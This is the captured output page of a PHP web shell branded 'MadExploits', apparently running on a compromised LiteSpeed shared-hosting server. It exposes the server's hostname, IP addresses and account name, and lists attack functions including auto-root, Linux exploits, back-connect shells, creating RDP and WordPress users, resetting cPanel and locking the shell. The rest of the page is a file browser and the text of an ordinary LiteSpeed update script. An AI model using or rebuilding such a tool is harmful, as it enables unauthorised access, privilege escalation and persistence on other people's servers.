Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
local /
lsws /
admin /
misc /
[ HOME SHELL ]
Name
Size
Permission
Action
admpass.sh
1.17
KB
-r-xr-xr-x
ap_lsws.sh
1.82
KB
-rwxr-xr-x
ap_lsws.sh.in
1.82
KB
-r-xr-xr-x
awstats_install.sh
2.06
KB
-r-xr-xr-x
build_ap_wrapper.sh
624
B
-r-xr-xr-x
chroot.sh
7.31
KB
-r-xr-xr-x
cleancache.sh
1.46
KB
-r-xr-xr-x
cleanlitemage.sh
2.4
KB
-r-xr-xr-x
cp_switch_ws.sh
22.41
KB
-r-xr-xr-x
cpanel_restart_httpd.in
732
B
-r-xr-xr-x
create_admin_keypair.sh
336
B
-r-xr-xr-x
enable_ruby_python_selector.sh
2.68
KB
-r-xr-xr-x
fix_cagefs.sh
766
B
-r-xr-xr-x
fp_install.sh
1.65
KB
-r-xr-xr-x
gdb-bt
25
B
-rw-r--r--
genjCryptionKeyPair.php
6.43
KB
-rw-r--r--
gzipStatic.sh
272
B
-r-xr-xr-x
htpasswd.php
103
B
-rw-r--r--
lscmctl
15.3
KB
-rwxrwxr-x
lshttpd.service
660
B
-r-xr-xr-x
lsup.sh
5.65
KB
-r-xr-xr-x
lsup6.sh
5.65
KB
-r-xr-xr-x
lsws.rc
1.78
KB
-r-xr-xr-x
lsws.rc.gentoo
441
B
-r-xr-xr-x
mgr_ver.sh
1.93
KB
-r-xr-xr-x
php.ini
37.11
KB
-rw-r--r--
purge_cache_by_url
3.23
KB
-r-xr-xr-x
rc-inst.sh
6.24
KB
-r-xr-xr-x
rc-uninst.sh
4.61
KB
-r-xr-xr-x
uninstall.sh
2.9
KB
-r-xr-xr-x
update.sh
1.85
KB
-r-xr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lsup6.sh
CURDIR=`dirname "$0"` cd $CURDIR CURDIR=`pwd` LSWSHOME=`dirname $CURDIR` LSWSHOME=`dirname $LSWSHOME` display_usage() { cat <<EOF Usage: lsup.sh [-s] [-f] [-v VERSION] [-b BUILD_NUMBER] -f Force reinstall. If -f is not given and same version already installed, this upgrade command is aborted. With -f option, latest build will be downloaded and installed even within same release version. -v VERSION If VERSION is given, this command will try to install specified VERSION. Otherwise, it will get the latest version from $LSWSHOME/autoupdate/release. -b BUILD_NUMBER Explicitily set the build number, it can be used to downgrade to an older build. -s Comunicate with server using HTTPS instead of HTTP. -w Do not run wswatch.sh --help display this help and exit EOF exit 1 } FORCED=N VERSION=x BUILD= DEBUG=0 HTTPS=s NO_WSWATCH=0 while [ "x$1" != "x" ] do if [ "x$1" = "x-d" ] ; then DEBUG=1 elif [ "x$1" = "x-f" ] ; then FORCED=Y elif [ "x$1" = "x-s" ] ; then HTTPS=s elif [ "x$1" = "x-w" ] ; then NO_WSWATCH=1 elif [ "x$1" = "--help" ] ; then display_usage elif [ "x$1" = "x-v" ] ; then shift VERSION=$1 if [ "x$VERSION" = "x" ] ; then display_usage fi elif [ "x$1" = "x-b" ] ; then shift BUILD="$1" if [ "x$BUILD" = "x" ] ; then display_usage fi else display_usage fi shift; done # detect download method OS=`uname -s` DLCMD=x if [ "x$OS" = "xFreeBSD" ] ; then DL=`which fetch` if [ $? -eq 0 ] ; then DLCMD="$DL -o" fi fi if [ "$DLCMD" = "x" ] ; then DL=`which wget` if [ $? -eq 0 ] ; then DLCMD="$DL -nv -O" fi fi if [ "$DLCMD" = "x" ] ; then DL=`which curl` if [ $? -eq 0 ] ; then DLCMD="$DL -L -o" fi fi if [ "$DLCMD" = "x" ] ; then echo "[ERROR] Fail to detect proper download method" exit 1 fi CURVERSION=`cat $LSWSHOME/VERSION` CURBUILD=`cat $LSWSHOME/BUILD.$CURVERSION` echo "Installed '$CURVERSION build $CURBUILD'" # check stable release LATEST_URL="http$HTTPS://update.litespeedtech.com/ws/latest.php" $DLCMD "$LSWSHOME/autoupdate/latest" $LATEST_URL LSWS_STABLE_LINE=`cat "$LSWSHOME/autoupdate/latest" | grep LSWS_STABLE` LSWS_STABLE_VER=`expr "$LSWS_STABLE_LINE" : '.*LSWS_STABLE=\(.*\) BUILD .*'` LSWS_STABLE_BUILD=`expr "$LSWS_STABLE_LINE" : '.*LSWS_STABLE=.* BUILD \(.*\)'` if [ "x$CURVERSION" = "x$LSWS_STABLE_VER" ] && [ "x$CURBUILD" = "x$LSWS_STABLE_BUILD" ]; then touch "$LSWSHOME/autoupdate/follow_stable" fi if [ $VERSION = "x" ] && [ "$FORCED" = "N" ] ; then if [ "x$CURVERSION" = "x$LSWS_STABLE_VER" ] && [ "x$CURBUILD" = "x$LSWS_STABLE_BUILD" ]; then echo "Latest STABLE release has been installed. No update." exit 0 fi if [ -f "$LSWSHOME/autoupdate/follow_stable" ]; then VERSION=$LSWS_STABLE_VER BUILD=$LSWS_STABLE_BUILD echo "Follow STABLE release '$LSWS_STABLE_VER build $LSWS_STABLE_BUILD'" else echo "Was not following STABLE releases, abort." echo "To start following STABLE release, run" echo " lsup.sh -f -v $LSWS_STABLE_VER -b $LSWS_STABLE_BUILD" exit 2 fi fi # check latest release $LSWSHOME/bin/lshttpd -U if [ ! -f "$LSWSHOME/autoupdate/release" ] ; then echo "[ERROR] Fail to locate file $LSWSHOME/autoupdate/release" exit 1 fi if [ ! -f "$LSWSHOME/autoupdate/platform" ] ; then echo "[ERROR] Fail to locate file $LSWSHOME/autoupdate/platform" exit 1 fi RELEASE=`cat $LSWSHOME/autoupdate/release` PLATFORM=`cat $LSWSHOME/autoupdate/platform` EDITION=`expr $RELEASE : '.*-\(.*\)'` if [ $VERSION = "x" ] ; then VERSION=`expr $RELEASE : '\(.*\)-'` else RELEASE="$VERSION-$EDITION" fi FILENAME="lsws-$RELEASE-$PLATFORM.tar.gz" if [ -e "$LSWSHOME/autoupdate/$FILENAME" ] ; then /bin/rm -f "$LSWSHOME/autoupdate/$FILENAME" fi MAJOR_VERSION=`expr $VERSION : '\([0-9]*\)\..*'` if [ $DEBUG = '1' ]; then DOWNLOAD_URL="http$HTTPS://www.litespeedtech.com/packages/dbg/lsws-$RELEASE-$PLATFORM-dbg.tar.gz" else DOWNLOAD_URL="http$HTTPS://www.litespeedtech.com/packages/$MAJOR_VERSION.0/$FILENAME" if [ "x$BUILD" = 'x' ]; then echo "Query latest build of $FILENAME" BUILD_URL=$DOWNLOAD_URL.lastbuild $DLCMD "$LSWSHOME/autoupdate/build" $BUILD_URL BUILD=`cat "$LSWSHOME/autoupdate/build"` fi if [ "x$BUILD" != 'x' ]; then if [ "$VERSION" = "$CURVERSION" ] && [ "x$CURBUILD" = "x$BUILD" ] && [ "$FORCED" = "N" ] ; then echo "Package $VERSION BUILD $CURBUILD already installed. If need to do force reinstall, please use option -f" exit 1 fi echo "Download Build [$BUILD]." fi DOWNLOAD_URL="$DOWNLOAD_URL.$BUILD" fi echo "$DLCMD $LSWSHOME/autoupdate/$FILENAME $DOWNLOAD_URL" $DLCMD "$LSWSHOME/autoupdate/$FILENAME" $DOWNLOAD_URL if [ $? != 0 ]; then echo "[ERROR] Failed to download $DOWNLOAD_URL" exit 2 fi if [ "x$VERSION" = "x$LSWS_STABLE_VER" ] && [ "x$BUILD" = "x$LSWS_STABLE_BUILD" ]; then if [ ! -f "$LSWSHOME/autoupdate/follow_stable" ]; then echo "Start to follow STABLE releases." touch "$LSWSHOME/autoupdate/follow_stable" fi elif [ -f "$LSWSHOME/autoupdate/follow_stable" ]; then echo "Diverted from STABLE releases." rm "$LSWSHOME/autoupdate/follow_stable" fi echo "$LSWSHOME/admin/misc/update.sh $VERSION $EDITION $PLATFORM" $LSWSHOME/admin/misc/update.sh $VERSION $EDITION $PLATFORM if [ $? != 0 ]; then echo "[ERROR] Failed to update to '$CURVERSION build $CURBUILD'" exit 3 fi echo "Restarting LSWS" $LSWSHOME/bin/lswsctrl fullrestart echo "Done"
Close